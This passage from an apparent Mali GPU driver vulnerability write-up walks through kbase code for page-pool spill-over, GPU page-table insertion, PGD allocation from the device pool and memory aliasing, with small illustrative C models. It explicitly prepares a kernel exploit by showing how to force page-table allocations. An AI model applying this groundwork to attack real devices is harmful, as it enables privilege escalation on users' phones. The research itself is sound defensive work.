			<span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">local_end_free</span><span class="p">;</span>

			<span class="n">local_end_free</span> <span class="o">=</span> <span class="n">start_free</span><span class="p">;</span>
			<span class="k">while</span> <span class="p">(</span><span class="n">nr_pages_to_free</span> <span class="o">&amp;&amp;</span>
				<span class="o">!</span><span class="n">is_huge</span><span class="p">(</span><span class="o">*</span><span class="n">local_end_free</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
				<span class="o">!</span><span class="n">is_partial</span><span class="p">(</span><span class="o">*</span><span class="n">local_end_free</span><span class="p">))</span> <span class="p">{</span>
				<span class="n">local_end_free</span><span class="o">++</span><span class="p">;</span>
				<span class="n">nr_pages_to_free</span><span class="o">--</span><span class="p">;</span>
			<span class="p">}</span>
			<span class="n">kbase_mem_pool_free_pages</span><span class="p">(</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
				<span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">mem_pools</span><span class="p">.</span><span class="n">small</span><span class="p">[</span><span class="n">alloc</span><span class="o">-&gt;</span><span class="n">group_id</span><span class="p">],</span>
				<span class="n">local_end_free</span> <span class="o">-</span> <span class="n">start_free</span><span class="p">,</span>
				<span class="n">start_free</span><span class="p">,</span>
				<span class="n">syncback</span><span class="p">,</span>
				<span class="n">reclaimed</span><span class="p">);</span>
			<span class="n">freed</span> <span class="o">+=</span> <span class="n">local_end_free</span> <span class="o">-</span> <span class="n">start_free</span><span class="p">;</span>
			<span class="n">start_free</span> <span class="o">+=</span> <span class="n">local_end_free</span> <span class="o">-</span> <span class="n">start_free</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><a id="pool_free"></a><code class="language-plaintext highlighter-rouge">kbase_mem_pool_free_pages</code> first tries to return the pages to the <code class="language-plaintext highlighter-rouge">kbase_context</code> pool [1]. If that pool
does not have enough capacity, the remainder spills over to the next pool [2], which is the <code class="language-plaintext highlighter-rouge">kbase_device</code> pool of the same <code class="language-plaintext highlighter-rouge">group_id</code>.
Any pages that still do not fit, or all pages if there is no next pool, are freed back to the kernel [3].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kbase_mem_pool_free_pages</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">pages</span><span class="p">,</span> <span class="n">bool</span> <span class="n">dirty</span><span class="p">,</span> <span class="n">bool</span> <span class="n">reclaimed</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">reclaimed</span><span class="p">)</span> <span class="p">{</span>
		<span class="cm">/* Add to this pool */</span>
		<span class="n">nr_to_pool</span> <span class="o">=</span> <span class="n">kbase_mem_pool_capacity</span><span class="p">(</span><span class="n">pool</span><span class="p">);</span>
		<span class="n">nr_to_pool</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">nr_pages</span><span class="p">,</span> <span class="n">nr_to_pool</span><span class="p">);</span>

		<span class="n">kbase_mem_pool_add_array</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="n">nr_to_pool</span><span class="p">,</span> <span class="n">pages</span><span class="p">,</span> <span class="nb">false</span><span class="p">,</span> <span class="n">dirty</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>

		<span class="n">i</span> <span class="o">+=</span> <span class="n">nr_to_pool</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">!=</span> <span class="n">nr_pages</span> <span class="o">&amp;&amp;</span> <span class="n">next_pool</span><span class="p">)</span> <span class="p">{</span>
			<span class="cm">/* Spill to next pool (may overspill) */</span>
			<span class="n">nr_to_pool</span> <span class="o">=</span> <span class="n">kbase_mem_pool_capacity</span><span class="p">(</span><span class="n">next_pool</span><span class="p">);</span>
			<span class="n">nr_to_pool</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">nr_pages</span> <span class="o">-</span> <span class="n">i</span><span class="p">,</span> <span class="n">nr_to_pool</span><span class="p">);</span>

			<span class="n">kbase_mem_pool_add_array</span><span class="p">(</span><span class="n">next_pool</span><span class="p">,</span> <span class="n">nr_to_pool</span><span class="p">,</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
					<span class="n">pages</span> <span class="o">+</span> <span class="n">i</span><span class="p">,</span> <span class="nb">true</span><span class="p">,</span> <span class="n">dirty</span><span class="p">);</span>
			<span class="n">i</span> <span class="o">+=</span> <span class="n">nr_to_pool</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="cm">/* Free any remaining pages to kernel */</span>
	<span class="k">for</span> <span class="p">(;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">nr_pages</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="n">p</span> <span class="o">=</span> <span class="n">as_page</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
		<span class="n">kbase_mem_pool_free_page</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
		<span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">as_tagged</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
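
<p>The spill-over arithmetic can be sketched as a small userspace model. This is only an illustration of the page counts, not driver code: <code class="language-plaintext highlighter-rouge">struct pool_model</code>, <code class="language-plaintext highlighter-rouge">struct free_result</code> and <code class="language-plaintext highlighter-rouge">model_free_pages</code> are hypothetical names, and the pool sizes in <code class="language-plaintext highlighter-rouge">main</code> are made up.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;stddef.h&gt;

/* Hypothetical, simplified stand-in for struct kbase_mem_pool. */
struct pool_model {
	size_t cur_size; /* pages currently held by the pool */
	size_t max_size; /* maximum pages the pool may hold */
};

struct free_result {
	size_t to_pool;      /* [1] pages absorbed by the context pool */
	size_t to_next_pool; /* [2] pages spilled to the device pool */
	size_t to_kernel;    /* [3] pages handed back to the kernel */
};

static size_t pool_capacity(const struct pool_model *p)
{
	return p-&gt;max_size &gt; p-&gt;cur_size ? p-&gt;max_size - p-&gt;cur_size : 0;
}

static size_t min_sz(size_t a, size_t b)
{
	return a &lt; b ? a : b;
}

/* Mirrors only the counting logic of the function shown above. */
static struct free_result model_free_pages(struct pool_model *pool,
					   struct pool_model *next_pool,
					   size_t nr_pages, int reclaimed)
{
	struct free_result r = { 0, 0, 0 };
	size_t i = 0;

	if (!reclaimed) {
		/* Fill the context pool first */
		r.to_pool = min_sz(nr_pages, pool_capacity(pool));
		pool-&gt;cur_size += r.to_pool;
		i += r.to_pool;

		if (i != nr_pages &amp;&amp; next_pool) {
			/* Spill whatever fits into the next pool */
			r.to_next_pool = min_sz(nr_pages - i,
						pool_capacity(next_pool));
			next_pool-&gt;cur_size += r.to_next_pool;
			i += r.to_next_pool;
		}
	}

	/* Everything left over goes back to the kernel */
	r.to_kernel = nr_pages - i;
	return r;
}

int main(void)
{
	/* Made-up sizes: 6 free slots in the context pool, 2 in the device pool */
	struct pool_model ctx_pool = { 250, 256 };
	struct pool_model dev_pool = { 254, 256 };
	struct free_result r = model_free_pages(&amp;ctx_pool, &amp;dev_pool, 10, 0);

	printf("ctx pool: %zu, device pool: %zu, kernel: %zu\n",
	       r.to_pool, r.to_next_pool, r.to_kernel);
	return 0;
}
</code></pre></div></div>

<p>With these numbers, freeing 10 pages puts 6 in the context pool, 2 in the device pool and returns 2 to the kernel. Which pool a freed page lands in therefore depends on how full both pools are at the time of the free.</p>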

<p>Now, to map the allocated physical pages into the GPU page table, userspace has to call <code class="language-plaintext highlighter-rouge">mmap</code> with
the cookie that was returned. When the cookie is one meant for memory allocation, the <code class="language-plaintext highlighter-rouge">mmap</code> call ultimately reaches
<code class="language-plaintext highlighter-rouge">kbase_gpu_mmap</code>. <code class="language-plaintext highlighter-rouge">kbase_gpu_mmap</code> then
inserts entries into the GPU page table using <code class="language-plaintext highlighter-rouge">kbase_mmu_insert_pages</code>, with
<code class="language-plaintext highlighter-rouge">reg-&gt;start_pfn</code> [1] used to navigate the page table and create entries at the appropriate page table
level.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_gpu_mmap</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span>
		   <span class="n">u64</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">align</span><span class="p">,</span>
		   <span class="k">enum</span> <span class="n">kbase_caller_mmu_sync_info</span> <span class="n">mmu_sync_info</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">type</span> <span class="o">==</span> <span class="n">KBASE_MEM_TYPE_ALIAS</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_mmu_insert_pages</span><span class="p">(</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">kbdev</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">mmu</span><span class="p">,</span>
				     <span class="n">reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span><span class="p">,</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
				     <span class="n">kbase_get_gpu_phy_pages</span><span class="p">(</span><span class="n">reg</span><span class="p">),</span>
				     <span class="n">kbase_reg_current_backed_size</span><span class="p">(</span><span class="n">reg</span><span class="p">),</span>
				     <span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">gwt_mask</span><span class="p">,</span> <span class="n">kctx</span><span class="o">-&gt;</span><span class="n">as_nr</span><span class="p">,</span>
				     <span class="n">group_id</span><span class="p">,</span> <span class="n">mmu_sync_info</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The Mali GPU employs a 4-level page table with levels 0 to 3, where a page global directory
(PGD) on each level contains 512 entries with each entry pointing to a PGD on the next level
(with the exception of the lowest level, level 3, where each PGD entry points to the backing physical page). The top
level PGD is pointed to by <code class="language-plaintext highlighter-rouge">kctx-&gt;mmu.pgd</code> and navigation of the GPU page tables begins from
there. Thus, each process that uses the Mali driver (and by extension each <code class="language-plaintext highlighter-rouge">kbase_context</code>) will
have a GPU page table of its own. When inserting pages into the GPU page table,
<code class="language-plaintext highlighter-rouge">kbase_mmu_insert_pages_no_flush</code> inserts up to 512 pages at a time starting from
<code class="language-plaintext highlighter-rouge">start_vpfn</code> (the parameter that receives <code class="language-plaintext highlighter-rouge">reg-&gt;start_pfn</code> as its argument), and allocates new PGDs whenever necessary.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_mmu_insert_pages_no_flush</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
				    <span class="k">struct</span> <span class="n">kbase_mmu_table</span> <span class="o">*</span><span class="n">mmut</span><span class="p">,</span>
				    <span class="k">const</span> <span class="n">u64</span> <span class="n">start_vpfn</span><span class="p">,</span>
				    <span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">phys</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr</span><span class="p">,</span>
				    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span>
				    <span class="kt">int</span> <span class="k">const</span> <span class="n">group_id</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">phys_addr_t</span> <span class="n">pgd</span><span class="p">;</span>
	<span class="n">u64</span> <span class="o">*</span><span class="n">pgd_page</span><span class="p">;</span>
	<span class="n">u64</span> <span class="n">insert_vpfn</span> <span class="o">=</span> <span class="n">start_vpfn</span><span class="p">;</span>
	<span class="kt">size_t</span> <span class="n">remain</span> <span class="o">=</span> <span class="n">nr</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">err</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">kbase_mmu_mode</span> <span class="k">const</span> <span class="o">*</span><span class="n">mmu_mode</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="k">while</span> <span class="p">(</span><span class="n">remain</span><span class="p">)</span> <span class="p">{</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">vindex</span> <span class="o">=</span> <span class="n">insert_vpfn</span> <span class="o">&amp;</span> <span class="mh">0x1FF</span><span class="p">;</span>
		<span class="c1">// KBASE_MMU_PAGE_ENTRIES = 512</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">count</span> <span class="o">=</span> <span class="n">KBASE_MMU_PAGE_ENTRIES</span> <span class="o">-</span> <span class="n">vindex</span><span class="p">;</span>
		<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">p</span><span class="p">;</span>
		<span class="kt">int</span> <span class="n">cur_level</span><span class="p">;</span>
		<span class="k">register</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">num_of_valid_entries</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">count</span> <span class="o">&gt;</span> <span class="n">remain</span><span class="p">)</span>
			<span class="n">count</span> <span class="o">=</span> <span class="n">remain</span><span class="p">;</span>
		<span class="p">...</span>
		<span class="k">do</span> <span class="p">{</span>
			<span class="c1">// cur_level = 3 for normal 4KB pages</span>
			<span class="n">err</span> <span class="o">=</span> <span class="n">mmu_get_pgd_at_level</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">mmut</span><span class="p">,</span> <span class="n">insert_vpfn</span><span class="p">,</span>
					   <span class="n">cur_level</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pgd</span><span class="p">);</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">!=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">)</span>
				<span class="k">break</span><span class="p">;</span>
			<span class="cm">/* Fill the memory pool with enough pages for
			 * the page walk to succeed
			 */</span>
			<span class="n">rt_mutex_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">mmut</span><span class="o">-&gt;</span><span class="n">mmu_lock</span><span class="p">);</span>
			<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_mem_pool_grow</span><span class="p">(</span>
				<span class="o">&amp;</span><span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">mem_pools</span><span class="p">.</span><span class="n">small</span><span class="p">[</span><span class="n">mmut</span><span class="o">-&gt;</span><span class="n">group_id</span><span class="p">],</span>
				<span class="n">cur_level</span><span class="p">);</span>
			<span class="n">rt_mutex_lock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">mmut</span><span class="o">-&gt;</span><span class="n">mmu_lock</span><span class="p">);</span>
		<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="o">!</span><span class="n">err</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">mmu_get_pgd_at_level</code> calls <code class="language-plaintext highlighter-rouge">mmu_get_next_pgd</code> to iteratively find the PGD at the next level,
until a PGD at the desired level is found. On each call to <code class="language-plaintext highlighter-rouge">mmu_get_next_pgd</code>, if the current PGD
holds a valid entry to the next level’s PGD, that PGD is returned. If not, a new PGD is allocated
using <code class="language-plaintext highlighter-rouge">kbase_mmu_alloc_pgd</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">mmu_get_next_pgd</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_mmu_table</span> <span class="o">*</span><span class="n">mmut</span><span class="p">,</span>
		<span class="n">phys_addr_t</span> <span class="o">*</span><span class="n">pgd</span><span class="p">,</span> <span class="n">u64</span> <span class="n">vpfn</span><span class="p">,</span> <span class="kt">int</span> <span class="n">level</span><span class="p">)</span>
<span class="p">{</span>
    <span class="p">...</span>
    <span class="n">vpfn</span> <span class="o">&gt;&gt;=</span> <span class="p">(</span><span class="mi">3</span> <span class="o">-</span> <span class="n">level</span><span class="p">)</span> <span class="o">*</span> <span class="mi">9</span><span class="p">;</span>
    <span class="n">vpfn</span> <span class="o">&amp;=</span> <span class="mh">0x1FF</span><span class="p">;</span>

    <span class="n">p</span> <span class="o">=</span> <span class="n">pfn_to_page</span><span class="p">(</span><span class="n">PFN_DOWN</span><span class="p">(</span><span class="o">*</span><span class="n">pgd</span><span class="p">));</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">kmap</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">page</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">dev_warn</span><span class="p">(</span><span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">dev</span><span class="p">,</span> <span class="s">"%s: kmap failure</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">__func__</span><span class="p">);</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="n">target_pgd</span> <span class="o">=</span> <span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">mmu_mode</span><span class="o">-&gt;</span><span class="n">pte_to_phy_addr</span><span class="p">(</span><span class="n">page</span><span class="p">[</span><span class="n">vpfn</span><span class="p">]);</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">target_pgd</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">target_pgd</span> <span class="o">=</span> <span class="n">kbase_mmu_alloc_pgd</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span> <span class="n">mmut</span><span class="p">);</span>
        <span class="p">...</span>
    <span class="p">}</span>
    <span class="p">...</span>
    <span class="o">*</span><span class="n">pgd</span> <span class="o">=</span> <span class="n">target_pgd</span><span class="p">;</span>
    <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
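
<p>The shift and mask at the top of <code class="language-plaintext highlighter-rouge">mmu_get_next_pgd</code> pick a 9-bit index out of the virtual page frame number for each level. A minimal standalone sketch of that arithmetic follows; <code class="language-plaintext highlighter-rouge">pgd_index</code> is a hypothetical helper and the GPU VA is an arbitrary value chosen for illustration, assuming 4KB pages.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;stdint.h&gt;

#define ENTRIES_PER_PGD 512u /* same value as KBASE_MMU_PAGE_ENTRIES */

/* Index into the PGD at `level` (0 = top, 3 = bottom) for a given VPFN.
 * Same shift-and-mask as in mmu_get_next_pgd above.
 */
static unsigned int pgd_index(uint64_t vpfn, int level)
{
	vpfn &gt;&gt;= (3 - level) * 9;
	return (unsigned int)(vpfn &amp; (ENTRIES_PER_PGD - 1));
}

int main(void)
{
	uint64_t gpu_va = 0x7f12345000ULL; /* arbitrary example address */
	uint64_t vpfn = gpu_va &gt;&gt; 12;      /* 4KB pages */
	int level;

	for (level = 0; level &lt;= 3; level++)
		printf("level %d index: %u\n", level, pgd_index(vpfn, level));
	return 0;
}
</code></pre></div></div>

<p>For this example address the indices are 0, 508, 145 and 325 for levels 0 to 3. Two virtual pages share a level 3 PGD only if their VPFNs differ in nothing but the lowest 9 bits.</p>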

<p><a id="alloc_pgd"></a><code class="language-plaintext highlighter-rouge">kbase_mmu_alloc_pgd</code> allocates a page from the <code class="language-plaintext highlighter-rouge">kbase_device</code> pool [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">phys_addr_t</span> <span class="nf">kbase_mmu_alloc_pgd</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_mmu_table</span> <span class="o">*</span><span class="n">mmut</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">u64</span> <span class="o">*</span><span class="n">page</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">i</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">p</span><span class="p">;</span>

	<span class="n">p</span> <span class="o">=</span> <span class="n">kbase_mem_pool_alloc</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kbdev</span><span class="o">-&gt;</span><span class="n">mem_pools</span><span class="p">.</span><span class="n">small</span><span class="p">[</span><span class="n">mmut</span><span class="o">-&gt;</span><span class="n">group_id</span><span class="p">]);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="p">...</span>
	<span class="k">return</span> <span class="n">page_to_phys</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After getting the required PGD, <code class="language-plaintext highlighter-rouge">kbase_mmu_insert_pages_no_flush</code> then inserts an address translation entry (ATE) in the PGD for each corresponding physical page that needs to be mapped.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_mmu_insert_pages_no_flush</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_device</span> <span class="o">*</span><span class="n">kbdev</span><span class="p">,</span>
				    <span class="k">struct</span> <span class="n">kbase_mmu_table</span> <span class="o">*</span><span class="n">mmut</span><span class="p">,</span>
				    <span class="k">const</span> <span class="n">u64</span> <span class="n">start_vpfn</span><span class="p">,</span>
				    <span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">phys</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr</span><span class="p">,</span>
				    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span>
				    <span class="kt">int</span> <span class="k">const</span> <span class="n">group_id</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">u64</span> <span class="n">insert_vpfn</span> <span class="o">=</span> <span class="n">start_vpfn</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="k">while</span> <span class="p">(</span><span class="n">remain</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">vindex</span> <span class="o">=</span> <span class="n">insert_vpfn</span> <span class="o">&amp;</span> <span class="mh">0x1FF</span><span class="p">;</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">count</span> <span class="o">=</span> <span class="n">KBASE_MMU_PAGE_ENTRIES</span> <span class="o">-</span> <span class="n">vindex</span><span class="p">;</span> <span class="c1">// KBASE_MMU_PAGE_ENTRIES = 512</span>
		<span class="p">...</span>
		<span class="n">p</span> <span class="o">=</span> <span class="n">pfn_to_page</span><span class="p">(</span><span class="n">PFN_DOWN</span><span class="p">(</span><span class="n">pgd</span><span class="p">));</span>
		<span class="p">...</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">cur_level</span> <span class="o">==</span> <span class="n">MIDGARD_MMU_LEVEL</span><span class="p">(</span><span class="mi">2</span><span class="p">))</span> <span class="p">{</span>
			<span class="p">...</span>
		<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
			<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
				<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">ofs</span> <span class="o">=</span> <span class="n">vindex</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span>
				<span class="n">u64</span> <span class="o">*</span><span class="n">target</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">pgd_page</span><span class="p">[</span><span class="n">ofs</span><span class="p">];</span>

				<span class="n">WARN_ON</span><span class="p">((</span><span class="o">*</span><span class="n">target</span> <span class="o">&amp;</span> <span class="mi">1UL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">);</span>
				<span class="o">*</span><span class="n">target</span> <span class="o">=</span> <span class="n">kbase_mmu_create_ate</span><span class="p">(</span><span class="n">kbdev</span><span class="p">,</span>
					<span class="n">phys</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">flags</span><span class="p">,</span> <span class="n">cur_level</span><span class="p">,</span> <span class="n">group_id</span><span class="p">,</span> <span class="n">nr</span><span class="p">);</span>
			<span class="p">}</span>
			<span class="n">num_of_valid_entries</span> <span class="o">+=</span> <span class="n">count</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="n">mmu_mode</span><span class="o">-&gt;</span><span class="n">set_num_valid_entries</span><span class="p">(</span><span class="n">pgd_page</span><span class="p">,</span> <span class="n">num_of_valid_entries</span><span class="p">);</span>

		<span class="n">phys</span> <span class="o">+=</span> <span class="n">count</span><span class="p">;</span>
		<span class="n">insert_vpfn</span> <span class="o">+=</span> <span class="n">count</span><span class="p">;</span>
		<span class="n">remain</span> <span class="o">-=</span> <span class="n">count</span><span class="p">;</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><a id="pgd_alloc_for_exp"></a>When any PGD entry for the next level is invalid in the process of retrieving the lowest level PGD (level 3), the missing PGD is allocated using <code class="language-plaintext highlighter-rouge">kbase_mmu_alloc_pgd</code>. To ensure that a PGD gets allocated, we either need at least one PGD along the walk to not be allocated yet, or we can simply make <code class="language-plaintext highlighter-rouge">kbase_mmu_insert_pages_no_flush</code> map more than 512 pages. Since each level 3 PGD can only hold 512 entries, such a mapping has to continue into the next level 3 PGD, which forces that PGD to be allocated if it does not exist yet. This will be important in exploiting the vulnerability later.</p>
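
<p>To make the 512-page boundary concrete, the chunking logic of the insertion loop can be replayed in userspace to count how many level 3 PGDs a mapping writes into. This is a sketch under the assumption of normal 4KB pages only; <code class="language-plaintext highlighter-rouge">level3_pgds_touched</code> is a hypothetical helper, not a driver function.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;stdint.h&gt;
#include &lt;stddef.h&gt;

#define ENTRIES_PER_PGD 512u /* same value as KBASE_MMU_PAGE_ENTRIES */

/* Count the level 3 PGDs written when mapping `nr` pages from `start_vpfn`,
 * using the same vindex/count chunking as kbase_mmu_insert_pages_no_flush.
 */
static size_t level3_pgds_touched(uint64_t start_vpfn, size_t nr)
{
	uint64_t insert_vpfn = start_vpfn;
	size_t remain = nr;
	size_t pgds = 0;

	while (remain) {
		unsigned int vindex = (unsigned int)(insert_vpfn &amp; 0x1FF);
		size_t count = ENTRIES_PER_PGD - vindex;

		if (count &gt; remain)
			count = remain;

		pgds++; /* one level 3 PGD per loop iteration */
		insert_vpfn += count;
		remain -= count;
	}
	return pgds;
}

int main(void)
{
	printf("512 pages at vpfn 0:   %zu PGD(s)\n", level3_pgds_touched(0, 512));
	printf("513 pages at vpfn 0:   %zu PGD(s)\n", level3_pgds_touched(0, 513));
	printf("2 pages at vpfn 511:   %zu PGD(s)\n", level3_pgds_touched(511, 2));
	return 0;
}
</code></pre></div></div>

<p>An aligned 512-page mapping fits in a single level 3 PGD, while 513 pages always need a second one regardless of alignment. A small mapping can also cross into a second PGD if it straddles a 512-page boundary, as the last case shows.</p>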

<p>Another type of memory allocation is the memory alias operation, invoked with the
ioctl <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_ALIAS</code> and handled by the <code class="language-plaintext highlighter-rouge">kbase_mem_alias</code> function. It
creates a new GPU VA region whose pages map to the physical pages of regions that already
exist. Each mapping can start from a chosen offset (in pages) into the
backing region, and a single alias region can map ranges of
physical pages from multiple regions. For example, one could allocate two regions of 2
pages each and then create a 4-page alias region that maps to both regions’ physical
pages. In the configuration illustrated below, page 0 of the alias region maps to physical page 1 of region 1, while
pages 2 and 3 of the alias region map to physical pages 0 and 1 of region 2 respectively.</p>

